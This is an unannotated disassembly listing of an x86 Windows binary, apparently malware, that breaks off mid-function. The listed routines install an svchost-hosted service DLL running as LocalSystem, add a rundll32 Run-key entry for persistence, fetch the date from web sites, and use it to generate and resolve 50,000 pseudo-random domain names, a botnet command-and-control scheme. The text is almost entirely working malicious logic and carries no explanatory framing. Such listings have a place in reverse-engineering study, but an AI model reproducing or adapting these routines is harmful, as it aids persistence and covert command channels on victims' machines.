mov eax, [ebp+104h+arg_4]
push edi
mov dword ptr [ebp+104h+Data], eax
mov eax, [ebp+104h+arg_8]
mov [ebp+104h+var_174], ecx
push 13h
mov [ebp+104h+lpData], eax
mov eax, [ebp+104h+Str]
pop ecx
xor ebx, ebx
mov esi, offset aSystemrootSyst ; "%SystemRoot%\\system32\\svchost.exe -k "
lea edi, [ebp+104h+Source]
push eax ; Str
mov [ebp+104h+var_168], eax
mov [ebp+104h+var_180], ebx
rep movsd
call wcslen
pop ecx
lea eax, [eax+eax+4Ch]
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov esi, eax
cmp esi, ebx
mov [ebp+104h+hMem], esi
jnz short loc_9A7BBE
xor eax, eax
jmp loc_9A7DF7
; ---------------------------------------------------------------------------
loc_9A7BBE: ; CODE XREF: sub_9A7B42+73�j
lea eax, [ebp+104h+Source]
push eax ; Source
push esi ; Dest
call wcscpy
push [ebp+104h+var_168] ; Source
push esi ; Dest
call wcscat
push dword ptr [ebp+104h+Data]
mov ecx, [ebp+104h+var_168]
call sub_9A7641
add esp, 14h
test eax, eax
jz loc_9A7DEB
push 11h
pop ecx
lea eax, [ebp+104h+var_48]
push eax ; Source
lea eax, [ebp+104h+SubKey]
mov esi, offset aSystemCurren_0 ; "SYSTEM\\CurrentControlSet\\Services"
lea edi, [ebp+104h+var_48]
push eax ; Dest
rep movsd
call wcscpy
mov esi, wcscat
lea eax, [ebp+104h+SubKey]
push offset asc_9A30BC ; "\\"
push eax ; Dest
call esi ; wcscat
push dword ptr [ebp+104h+Data] ; Source
lea eax, [ebp+104h+SubKey]
push eax ; Dest
call esi ; wcscat
add esp, 18h
push ebx ; lpdwDisposition
lea eax, [ebp+104h+hKey]
push eax ; phkResult
push ebx ; lpSecurityAttributes
mov edi, 0F003Fh
push edi ; samDesired
push ebx ; dwOptions
push ebx ; lpClass
push ebx ; Reserved
lea eax, [ebp+104h+SubKey]
push eax ; lpSubKey
mov esi, 80000002h
push esi ; hKey
mov [ebp+104h+var_168], ebx
mov [ebp+104h+psidOwner], ebx
call RegCreateKeyExW
cmp eax, 5
jnz short loc_9A7CA2
lea eax, [ebp+104h+var_168]
push eax ; int
lea eax, [ebp+104h+psidOwner]
push eax ; ppsidOwner
lea eax, [ebp+104h+var_48]
push eax ; int
push esi ; int
call sub_9A706C
push ebx
lea eax, [ebp+104h+var_48]
push eax
push esi
call sub_9A7001
add esp, 1Ch
test eax, eax
jz loc_9A7DD0
push ebx
lea eax, [ebp+104h+SubKey]
push eax
push esi
call sub_9A7001
add esp, 0Ch
push ebx ; lpdwDisposition
lea eax, [ebp+104h+hKey]
push eax ; phkResult
push ebx ; lpSecurityAttributes
push edi ; samDesired
push ebx ; dwOptions
push ebx ; lpClass
push ebx ; Reserved
lea eax, [ebp+104h+SubKey]
push eax ; lpSubKey
push esi ; hKey
call RegCreateKeyExW
loc_9A7CA2: ; CODE XREF: sub_9A7B42+10D�j
cmp eax, ebx
jnz loc_9A7DD0
push [ebp+104h+lpData] ; Str
mov edi, wcslen
call edi ; wcslen
mov esi, RegSetValueExW
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+104h+lpData] ; lpData
push 1 ; dwType
push ebx ; Reserved
push offset ValueName ; "DisplayName"
push [ebp+104h+hKey] ; hKey
call esi ; RegSetValueExW
push 4 ; cbData
lea eax, [ebp+104h+Data]
push eax ; lpData
push 4 ; dwType
push ebx ; Reserved
push offset aType ; "Type"
push [ebp+104h+hKey] ; hKey
mov dword ptr [ebp+104h+Data], 20h
call esi ; RegSetValueExW
push 4 ; cbData
lea eax, [ebp+104h+Data]
push eax ; lpData
push 4 ; dwType
push ebx ; Reserved
push offset aStart ; "Start"
push [ebp+104h+hKey] ; hKey
mov dword ptr [ebp+104h+Data], 2
call esi ; RegSetValueExW
push 4 ; cbData
lea eax, [ebp+104h+Data]
push eax ; lpData
push 4 ; dwType
push ebx ; Reserved
push offset aErrorcontrol ; "ErrorControl"
push [ebp+104h+hKey] ; hKey
mov dword ptr [ebp+104h+Data], ebx
call esi ; RegSetValueExW
push [ebp+104h+hMem] ; Str
call edi ; wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+104h+hMem] ; lpData
push 2 ; dwType
push ebx ; Reserved
push offset aImagepath ; "ImagePath"
push [ebp+104h+hKey] ; hKey
call esi ; RegSetValueExW
push 18h ; cbData
push offset Data ; "LocalSystem"
push 1 ; dwType
push ebx ; Reserved
push offset aObjectname ; "ObjectName"
push [ebp+104h+hKey] ; hKey
call esi ; RegSetValueExW
push [ebp+104h+var_174] ; Str
call edi ; wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+104h+var_174] ; lpData
push 1 ; dwType
push ebx ; Reserved
push offset aDescription ; "Description"
push [ebp+104h+hKey] ; hKey
call esi ; RegSetValueExW
push ebx ; lpdwDisposition
lea eax, [ebp+104h+phkResult]
push eax ; phkResult
push ebx ; lpSecurityAttributes
push 20006h ; samDesired
push ebx ; dwOptions
push ebx ; lpClass
push ebx ; Reserved
push offset aParameters_0 ; "Parameters"
push [ebp+104h+hKey] ; hKey
call RegCreateKeyExW
test eax, eax
jnz short loc_9A7DB0
push [ebp+104h+var_170] ; Str
call edi ; wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
push [ebp+104h+var_170] ; lpData
push 2 ; dwType
push ebx ; Reserved
push offset aServicedll ; "ServiceDll"
push [ebp+104h+phkResult] ; hKey
call esi ; RegSetValueExW
push [ebp+104h+phkResult] ; hKey
call RegCloseKey
mov [ebp+104h+var_180], 1
loc_9A7DB0: ; CODE XREF: sub_9A7B42+241�j
push [ebp+104h+hKey] ; hKey
call RegFlushKey
push [ebp+104h+hKey] ; hKey
call sub_9A6CF7
pop ecx
push [ebp+104h+hKey] ; hKey
call RegCloseKey
mov esi, 80000002h
loc_9A7DD0: ; CODE XREF: sub_9A7B42+137�j
; sub_9A7B42+162�j
cmp [ebp+104h+var_168], ebx
jz short loc_9A7DEB
push [ebp+104h+var_168] ; int
lea eax, [ebp+104h+var_48]
push [ebp+104h+psidOwner] ; psidOwner
push eax ; int
push esi ; int
call sub_9A70DD
add esp, 10h
loc_9A7DEB: ; CODE XREF: sub_9A7B42+A1�j
; sub_9A7B42+291�j
push [ebp+104h+hMem] ; hMem
call GlobalFree
mov eax, [ebp+104h+var_180]
loc_9A7DF7: ; CODE XREF: sub_9A7B42+77�j
mov ecx, [ebp+104h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
add ebp, 104h
leave
retn
sub_9A7B42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
; int __cdecl sub_9A7E0F(char *Str)
sub_9A7E0F proc near ; CODE XREF: sub_9A3715+12C�p
Memory = dword ptr -33Ch
hMem = dword ptr -338h
var_334 = dword ptr -334h
psidOwner = dword ptr -330h
var_32C = dword ptr -32Ch
phkResult = dword ptr -328h
hKey = dword ptr -324h
Data = byte ptr -320h
var_11A = word ptr -11Ah
Dst = byte ptr -118h
Dest = word ptr -98h
ValueName = word ptr -18h
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 33Ch
mov eax, dword_9B8788
xor eax, ebp
push ebx
mov [ebp+74h+var_4], eax
mov eax, [ebp+74h+Str]
push edi
xor edi, edi
push eax ; Str
mov [ebp+74h+phkResult], eax
mov [ebp+74h+var_334], edi
call strlen
mov ebx, eax
pop ecx
lea eax, [ebx+ebx+2]
push eax ; dwBytes
push 40h ; uFlags
mov [ebp+74h+var_32C], ebx
call GlobalAlloc
cmp eax, edi
mov [ebp+74h+hMem], eax
jnz short loc_9A7E64
xor eax, eax
jmp loc_9A8122
; ---------------------------------------------------------------------------
loc_9A7E64: ; CODE XREF: sub_9A7E0F+4C�j
mov eax, dword_9BB1DC
xor eax, 84C3562Ch
push esi
push eax ; Seed
call srand
pop ecx
call sub_9A7374
mov esi, rand
mov [ebp+74h+Memory], eax
call esi ; rand
push 8
cdq
pop ecx
idiv ecx
test edx, edx
jnz short loc_9A7EAF
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+74h+Dst]
add edx, ecx
push edx
push eax
call sub_9A5E95
pop ecx
pop ecx
jmp short loc_9A7EC4
; ---------------------------------------------------------------------------
loc_9A7EAF: ; CODE XREF: sub_9A7E0F+83�j
push 80h ; Size
lea eax, [ebp+74h+Dst]
push edi ; Val
push eax ; Dst
call memset
add esp, 0Ch
loc_9A7EC4: ; CODE XREF: sub_9A7E0F+9E�j
call esi ; rand
push 10h
cdq
pop ecx
idiv ecx
test edx, edx
jz short loc_9A7F2E
call esi ; rand
push 26h
xor edx, edx
pop ecx
div ecx
mov ebx, edx
loc_9A7EDB: ; CODE XREF: sub_9A7E0F+DD�j
call esi ; rand
push 26h
xor edx, edx
pop ecx
div ecx
cmp ebx, edx
mov [ebp+74h+psidOwner], edx
jz short loc_9A7EDB
push off_9B82B0[ebx*4] ; Source
lea eax, [ebp+74h+Dest]
push eax ; Dest
call wcscpy
mov ebx, wcscat
lea eax, [ebp+74h+Dest]
push offset asc_9A31E0 ; " "
push eax ; Dest
call ebx ; wcscat
mov eax, [ebp+74h+psidOwner]
push off_9B82B0[eax*4] ; Source
lea eax, [ebp+74h+Dest]
push eax ; Dest
call ebx ; wcscat
mov ebx, [ebp+74h+var_32C]
add esp, 18h
jmp short loc_9A7F44
; ---------------------------------------------------------------------------
loc_9A7F2E: ; CODE XREF: sub_9A7E0F+BF�j
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+74h+Dest]
add edx, ecx
push edx
push eax
call sub_9A5E95
pop ecx
pop ecx
loc_9A7F44: ; CODE XREF: sub_9A7E0F+11D�j
inc ebx
push ebx ; cchWideChar
push [ebp+74h+hMem] ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+74h+phkResult] ; lpMultiByteStr
push edi ; dwFlags
push edi ; CodePage
call MultiByteToWideChar
test eax, eax
jz loc_9A80FD
mov ecx, [ebp+74h+Memory]
push offset dword_9A13E4 ; Str
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+Dst]
push eax ; int
push [ebp+74h+hMem] ; int
call sub_9A7B42
add esp, 10h
cmp eax, edi
mov [ebp+74h+var_334], eax
jnz loc_9A80F8
mov eax, dword_9BB1DC
xor eax, 293BF4D3h
push eax ; Seed
call srand
call esi ; rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+74h+ValueName]
add edx, ecx
push edx
push eax
call sub_9A5E95
push offset aNmqflzhf ; "nmqflzhf"
push [ebp+74h+hMem]
lea eax, [ebp+74h+Data]
push offset aRundll32_exeSS ; "rundll32.exe \"%s\",%S"
push 104h ; Count
push eax ; Dest
call _snwprintf
mov ebx, RegCreateKeyExW
add esp, 20h
mov [ebp+74h+var_11A], di
mov [ebp+74h+hKey], 80000002h
mov esi, offset aSoftwareMicr_1 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
loc_9A7FFC: ; CODE XREF: sub_9A7E0F+2E3�j
cmp [ebp+74h+hKey], 80000001h
jb loc_9A80F8
push edi ; lpdwDisposition
lea eax, [ebp+74h+phkResult]
push eax ; phkResult
push edi ; lpSecurityAttributes
push 2 ; samDesired
push edi ; dwOptions
push edi ; lpClass
push edi ; Reserved
push esi ; lpSubKey
push [ebp+74h+hKey] ; hKey
mov [ebp+74h+var_32C], edi
mov [ebp+74h+psidOwner], edi
call ebx ; RegCreateKeyExW
cmp eax, 5
jnz short loc_9A8079
lea eax, [ebp+74h+var_32C]
push eax ; int
lea eax, [ebp+74h+psidOwner]
push eax ; ppsidOwner
push esi ; int
push [ebp+74h+hKey] ; int
call sub_9A706C
push edi
push esi
push [ebp+74h+hKey]
call sub_9A7001
add esp, 1Ch
test eax, eax
jz short loc_9A80C4
push edi ; lpdwDisposition
lea eax, [ebp+74h+phkResult]
push eax ; phkResult
push edi ; lpSecurityAttributes
push 2 ; samDesired
push edi ; dwOptions
push edi ; lpClass
push edi ; Reserved
push esi ; lpSubKey
push [ebp+74h+hKey] ; hKey
call ebx ; RegCreateKeyExW
loc_9A8079: ; CODE XREF: sub_9A7E0F+223�j
cmp eax, edi
jnz short loc_9A80C4
lea eax, [ebp+74h+Data]
push eax ; Str
call wcslen
pop ecx
lea eax, [eax+eax+2]
push eax ; cbData
lea eax, [ebp+74h+Data]
push eax ; lpData
push 1 ; dwType
push edi ; Reserved
lea eax, [ebp+74h+ValueName]
push eax ; lpValueName
push [ebp+74h+phkResult] ; hKey
call RegSetValueExW
test eax, eax
jnz short loc_9A80B8
mov [ebp+74h+var_334], 1
loc_9A80B8: ; CODE XREF: sub_9A7E0F+29D�j
push [ebp+74h+phkResult] ; hKey
call RegCloseKey
loc_9A80C4: ; CODE XREF: sub_9A7E0F+251�j
; sub_9A7E0F+26C�j
cmp [ebp+74h+var_32C], edi
jz short loc_9A80E6
push [ebp+74h+var_32C] ; int
push [ebp+74h+psidOwner] ; psidOwner
push esi ; int
push 80000002h ; int
call sub_9A70DD
add esp, 10h
loc_9A80E6: ; CODE XREF: sub_9A7E0F+2BB�j
dec [ebp+74h+hKey]
cmp [ebp+74h+var_334], edi
jz loc_9A7FFC
loc_9A80F8: ; CODE XREF: sub_9A7E0F+181�j
; sub_9A7E0F+1F7�j
call sub_9A731F
loc_9A80FD: ; CODE XREF: sub_9A7E0F+14F�j
push [ebp+74h+Memory] ; Memory
call free
pop ecx
push [ebp+74h+hMem] ; hMem
call GlobalFree
call sub_9A5D1A
mov eax, [ebp+74h+var_334]
pop esi
loc_9A8122: ; CODE XREF: sub_9A7E0F+50�j
mov ecx, [ebp+74h+var_4]
pop edi
xor ecx, ebp
pop ebx
call sub_9AAAC1
add ebp, 74h
leave
retn
sub_9A7E0F endp
; =============== S U B R O U T I N E =======================================
sub_9A8133 proc near ; CODE XREF: sub_9A8179+25�p
push ebx
xor ebx, ebx
test esi, esi
jz short loc_9A8175
cmp eax, 5FFh
jbe short loc_9A8175
push edi
lea edi, [eax-200h]
push edi ; int
push esi ; int
lea eax, [esi+eax-200h]
push eax ; int
push dword_9B8348 ; int
push offset dword_9B8350 ; Src
call sub_9A8C4C
add esp, 14h
test eax, eax
jz short loc_9A8174
push edi ; nNumberOfBytesToWrite
push esi ; int
call sub_9A7214
pop ecx
pop ecx
mov ebx, eax
loc_9A8174: ; CODE XREF: sub_9A8133+34�j
pop edi
loc_9A8175: ; CODE XREF: sub_9A8133+5�j
; sub_9A8133+C�j
mov eax, ebx
pop ebx
retn
sub_9A8133 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8179 proc near ; CODE XREF: sub_9A857A+271�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
xor edi, edi
push edi
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_9A60D7
mov esi, eax
add esp, 0Ch
cmp esi, edi
jz short loc_9A81AC
mov eax, [ebp+var_4]
cmp eax, edi
jz short loc_9A81A5
call sub_9A8133
mov edi, eax
loc_9A81A5: ; CODE XREF: sub_9A8179+23�j
push esi ; hMem
call GlobalFree
loc_9A81AC: ; CODE XREF: sub_9A8179+1C�j
mov eax, edi
pop edi
pop esi
leave
retn
sub_9A8179 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=3A0h
; int __fastcall sub_9A81B2(LPCSTR lpszUrl,int,int)
sub_9A81B2 proc near ; CODE XREF: sub_9A82C5+43�p
dwFlags = dword ptr -420h
hInternet = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
cbSize = dword ptr -40Ch
var_405 = byte ptr -405h
szAgent = byte ptr -404h
var_403 = byte ptr -403h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
lea ebp, [esp-3A0h]
sub esp, 420h
mov eax, dword_9B8788
xor eax, ebp
push ebx
mov [ebp+3A0h+var_4], eax
mov eax, [ebp+3A0h+arg_0]
push esi
xor ebx, ebx
mov [ebp+3A0h+var_418], eax
push ebx ; dwReserved
lea eax, [ebp+3A0h+dwFlags]
push eax ; lpdwFlags
mov esi, ecx
mov [ebp+3A0h+var_405], bl
call InternetGetConnectedState
test eax, eax
jz loc_9A82AB
push edi
xor eax, eax
mov [ebp+3A0h+szAgent], bl
mov ecx, 0FFh
lea edi, [ebp+3A0h+var_403]
rep stosd
stosw
stosb
lea eax, [ebp+3A0h+cbSize]
push eax ; cbSize
lea eax, [ebp+3A0h+szAgent]
push eax ; pszUAOut
push ebx ; dwOption
mov [ebp+3A0h+cbSize], 400h
call ObtainUserAgentString
push ebx ; dwFlags
push ebx ; lpszProxyBypass
push ebx ; lpszProxy
push ebx ; dwAccessType
lea eax, [ebp+3A0h+szAgent]
push eax ; lpszAgent
call InternetOpenA
cmp eax, ebx
mov [ebp+3A0h+hInternet], eax
jz short loc_9A82AA
push ebx ; dwContext
push 84080300h ; dwFlags
push ebx ; dwHeadersLength
push ebx ; lpszHeaders
push esi ; lpszUrl
push eax ; hInternet
call InternetOpenUrlA
mov esi, eax
cmp esi, ebx
jz short loc_9A82A1
mov edi, HttpQueryInfoA
lea eax, [ebp+3A0h+var_410]
push eax
lea eax, [ebp+3A0h+cbSize]
push eax
lea eax, [ebp+3A0h+var_414]
push eax
push 20000013h
push esi
mov [ebp+3A0h+var_410], ebx
mov [ebp+3A0h+cbSize], 4
call edi ; HttpQueryInfoA
test eax, eax
jz short loc_9A829A
cmp [ebp+3A0h+var_414], 0C8h
jnz short loc_9A829A
mov eax, [ebp+3A0h+arg_4]
mov [ebp+3A0h+cbSize], eax
lea eax, [ebp+3A0h+var_410]
push eax
lea eax, [ebp+3A0h+cbSize]
push eax
push [ebp+3A0h+var_418]
mov [ebp+3A0h+var_410], ebx
push 9
push esi
call edi ; HttpQueryInfoA
test eax, eax
jz short loc_9A829A
mov [ebp+3A0h+var_405], 1
loc_9A829A: ; CODE XREF: sub_9A81B2+B9�j
; sub_9A81B2+C2�j ...
push esi ; hInternet
call InternetCloseHandle
loc_9A82A1: ; CODE XREF: sub_9A81B2+91�j
push [ebp+3A0h+hInternet] ; hInternet
call InternetCloseHandle
loc_9A82AA: ; CODE XREF: sub_9A81B2+7B�j
pop edi
loc_9A82AB: ; CODE XREF: sub_9A81B2+3A�j
mov ecx, [ebp+3A0h+var_4]
mov al, [ebp+3A0h+var_405]
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
add ebp, 3A0h
leave
retn
sub_9A81B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=398h
sub_9A82C5 proc near ; CODE XREF: sub_9A83C7+56�p
var_418 = dword ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
Str = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-398h]
sub esp, 418h
mov eax, dword_9B8788
and [ebp+398h+var_40C], 0
xor eax, ebp
mov [ebp+398h+var_4], eax
mov eax, [ebp+398h+arg_0]
mov [ebp+398h+var_408], eax
mov eax, [ebp+398h+arg_4]
mov [ebp+398h+var_418], eax
mov eax, [ebp+398h+arg_8]
mov [ebp+398h+var_414], eax
lea eax, [ebp+398h+Str]
push 400h
push eax ; int
call sub_9A81B2
test al, al
pop ecx
pop ecx
jz loc_9A83AF
push esi
mov esi, strtok
push edi
mov edi, offset Delim ; ", "
lea eax, [ebp+398h+Str]
push edi ; Delim
push eax ; Str
call esi ; strtok
test eax, eax
pop ecx
pop ecx
jz short loc_9A83AD
push edi ; Delim
push 0 ; Str
call esi ; strtok
test eax, eax
pop ecx
pop ecx
jz short loc_9A83AD
push ebx
mov ebx, atoi
push eax ; Str
call ebx ; atoi
mov ecx, [ebp+398h+var_408]
push edi ; Delim
push 0 ; Str
mov [ecx], ax
call esi ; strtok
add esp, 0Ch
test eax, eax
mov [ebp+398h+var_410], eax
jz short loc_9A83AC
and [ebp+398h+var_408], 0
loc_9A835F: ; CODE XREF: sub_9A82C5+BD�j
mov eax, [ebp+398h+var_408]
push 3 ; MaxCount
push [ebp+398h+var_410] ; Str
push off_9B8570[eax*4] ; Str1
call _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_9A8386
inc [ebp+398h+var_408]
cmp [ebp+398h+var_408], 0Ch
jb short loc_9A835F
jmp short loc_9A8390
; ---------------------------------------------------------------------------
loc_9A8386: ; CODE XREF: sub_9A82C5+B4�j
mov eax, [ebp+398h+var_408]
mov ecx, [ebp+398h+var_418]
inc eax
mov [ecx], ax
loc_9A8390: ; CODE XREF: sub_9A82C5+BF�j
push edi ; Delim
push 0 ; Str
call esi ; strtok
test eax, eax
pop ecx
pop ecx
jz short loc_9A83AC
push eax ; Str
call ebx ; atoi
pop ecx
mov ecx, [ebp+398h+var_414]
mov [ecx], ax
mov [ebp+398h+var_40C], 1
loc_9A83AC: ; CODE XREF: sub_9A82C5+94�j
; sub_9A82C5+D4�j
pop ebx
loc_9A83AD: ; CODE XREF: sub_9A82C5+6A�j
; sub_9A82C5+75�j
pop edi
pop esi
loc_9A83AF: ; CODE XREF: sub_9A82C5+4C�j
mov ecx, [ebp+398h+var_4]
mov eax, [ebp+398h+var_40C]
xor ecx, ebp
call sub_9AAAC1
add ebp, 398h
leave
retn
sub_9A82C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A83C7 proc near ; CODE XREF: sub_9A857A+49�p
FileTime = _FILETIME ptr -3Ch
Dst = word ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
Dest = byte ptr -24h
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 3Ch
mov eax, dword_9B8788
push ebx
xor eax, ebp
push 10h ; Size
mov [ebp+var_4], eax
xor ebx, ebx
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
push offset dword_9BB310
call sub_9AA638
and eax, 7
push off_9B8550[eax*4]
lea eax, [ebp+Dest]
push offset aHttpWww_S ; "http://www.%s"
push 20h ; Count
push eax ; Dest
call _snprintf
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_32]
push eax
lea eax, [ebp+var_2E]
push eax
lea ecx, [ebp+Dest]
mov [ebp+var_5], bl
call sub_9A82C5
add esp, 2Ch
test eax, eax
jz short loc_9A843B
cmp [ebp+var_2E], bx
jz short loc_9A843B
cmp [ebp+var_32], bx
jz short loc_9A843B
cmp [ebp+Dst], bx
jnz short loc_9A8459
loc_9A843B: ; CODE XREF: sub_9A83C7+60�j
; sub_9A83C7+66�j ...
lea eax, [ebp+Dst]
push eax ; lpSystemTime
call GetSystemTime
mov [ebp+var_30], bx
mov [ebp+var_2C], bx
mov [ebp+var_26], bx
mov [ebp+var_2A], bx
mov [ebp+var_28], bx
loc_9A8459: ; CODE XREF: sub_9A83C7+72�j
lea eax, [ebp+FileTime]
push eax ; lpFileTime
lea eax, [ebp+Dst]
push eax ; lpSystemTime
call SystemTimeToFileTime
push 2
push 682D10B7h
push [ebp+FileTime.dwHighDateTime]
push [ebp+FileTime.dwLowDateTime]
call __allmul
push 192h
push 54D38000h
push edx
push eax
call __aulldiv
mov ecx, [ebp+var_4]
add eax, 0F1E34A09h
adc edx, ebx
xor ecx, ebp
mov dword ptr dbl_9B8770, eax
mov dword ptr dbl_9B8770+4, edx
pop ebx
call sub_9AAAC1
leave
retn
sub_9A83C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A84A9 proc near ; CODE XREF: sub_9A857A+9A�p
; sub_9A857A+CE�p ...
var_30 = qword ptr -30h
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
mov ecx, dword ptr dbl_9B8770+4
mov eax, dword ptr dbl_9B8770
and dword ptr [ebp+var_8], 0
push esi
mov edx, ecx
push edi
mov dword ptr [ebp+var_8+4], edx
mov edi, 7FFFFFFFh
and edx, edi
mov dword ptr [ebp+var_10], eax
mov dword ptr [ebp+var_10+4], edx
fild [ebp+var_10]
mov esi, 80000000h
and dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
and dword ptr [ebp+var_8], 0
mov dword ptr [ebp+var_8+4], ecx
and dword ptr [ebp+var_8+4], esi
fchs
and ecx, edi
faddp st(1), st
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], ecx
push ecx
fstp [ebp+var_10]
push ecx
fild [ebp+var_18]
fild [ebp+var_8]
fchs
faddp st(1), st
fstp [esp+30h+var_30]
call sin
add esp, 8
fstp [ebp+var_20]
push 0
push 4F3D859Eh
push dword ptr dbl_9B8770+4
push dword ptr dbl_9B8770
call __allmul
and dword ptr [ebp+var_8], 0
mov dword ptr [ebp+var_8+4], edx
and dword ptr [ebp+var_8+4], esi
and edx, edi
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
fild [ebp+var_8]
push ecx
fchs
faddp st(1), st
fadd [ebp+var_20]
fmul [ebp+var_10]
fadd dbl_9A3508
fmul [ebp+var_10]
fstp [ebp+var_20]
fld [ebp+var_10]
fstp [esp+30h+var_30]
call log
fadd [ebp+var_20]
pop ecx
pop ecx
pop edi
fstp dbl_9B8770
mov eax, dword ptr dbl_9B8770
pop esi
leave
retn
sub_9A84A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A857A proc near ; CODE XREF: StartAddress:loc_9A3C46�p
var_8B4 = dword ptr -8B4h
Dst = dword ptr -8A4h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
hMem = dword ptr -0A4h
var_A0 = dword ptr -0A0h
Dest = byte ptr -9Ch
var_1D = byte ptr -1Dh
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 894h
push offset stru_9A3520
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
xor edi, edi
mov [ebp+var_B0], edi
mov [ebp+hMem], edi
push 7D0h ; Size
push edi ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset
add esp, 0Ch
mov [ebp+ms_exc.disabled], edi
push offset dword_9BB310 ; dwBytes
call sub_9AA577
call sub_9A83C7
mov [esp+8B4h+var_8B4], 30D40h
push 40h ; uFlags
call GlobalAlloc
mov [ebp+hMem], eax
cmp eax, edi
jz loc_9A8862
loc_9A85E5: ; CODE XREF: sub_9A857A+131�j
mov [ebp+var_A0], edi
cmp edi, 0C350h
jnb loc_9A86B0
push 20h ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov ecx, [ebp+hMem]
lea ebx, [ecx+edi*4]
mov [ebx], eax
test eax, eax
jz loc_9A8862
call sub_9A84A9
push eax ; X
call labs
pop ecx
cdq
push 6
pop ecx
idiv ecx
mov esi, edx
add esi, 4
mov [ebp+var_BC], esi
mov ebx, [ebx]
mov [ebp+var_D0], ebx
and [ebp+var_AC], 0
loc_9A8640: ; CODE XREF: sub_9A857A+F2�j
cmp [ebp+var_AC], esi
jnb short loc_9A866E
call sub_9A84A9
push eax ; X
call labs
pop ecx
cdq
push 1Ah
pop ecx
idiv ecx
add edx, 61h
mov eax, [ebp+var_AC]
mov [eax+ebx], dl
inc [ebp+var_AC]
jmp short loc_9A8640
; ---------------------------------------------------------------------------
loc_9A866E: ; CODE XREF: sub_9A857A+CC�j
mov byte ptr [ebx+esi], 0
mov eax, [ebp+hMem]
lea esi, [eax+edi*4]
push offset a_ ; "."
push dword ptr [esi] ; Dest
call strcat
call sub_9A84A9
push eax ; X
call labs
xor edx, edx
push 74h
pop ecx
div ecx
push off_9B85A0[edx*4] ; Source
push dword ptr [esi] ; Dest
call strcat
add esp, 14h
inc edi
jmp loc_9A85E5
; ---------------------------------------------------------------------------
loc_9A86B0: ; CODE XREF: sub_9A857A+77�j
and [ebp+var_A0], 0
loc_9A86B7: ; CODE XREF: sub_9A857A+2DC�j
xor esi, esi
cmp [ebp+var_B0], esi
jnz loc_9A8862
cmp [ebp+var_A0], 1F4h
jnb loc_9A8862
call GetTickCount
mov [ebp+var_B8], eax
xor edi, edi
inc edi
mov [ebp+ms_exc.disabled], edi
push offset dword_9BB310
call sub_9AA638
pop ecx
xor edx, edx
mov ecx, 0C350h
div ecx
mov eax, [ebp+hMem]
mov edx, [eax+edx*4]
mov [ebp+var_C4], edx
push edx ; name
call gethostbyname
mov [ebp+var_D4], eax
cmp eax, esi
jz loc_9A880A
mov ecx, [eax+0Ch]
mov ecx, [ecx]
mov ecx, [ecx]
mov edx, [ebp+var_A0]
mov [ebp+edx*4+Dst], ecx
mov ecx, [eax+0Ch]
cmp [ecx], esi
jz loc_9A880A
mov eax, ecx
cmp [eax+4], esi
jnz loc_9A880A
mov eax, [eax]
mov esi, [eax]
mov [ebp+var_CC], esi
push esi
call sub_9A5CB5
pop ecx
test eax, eax
jz loc_9A880A
push esi
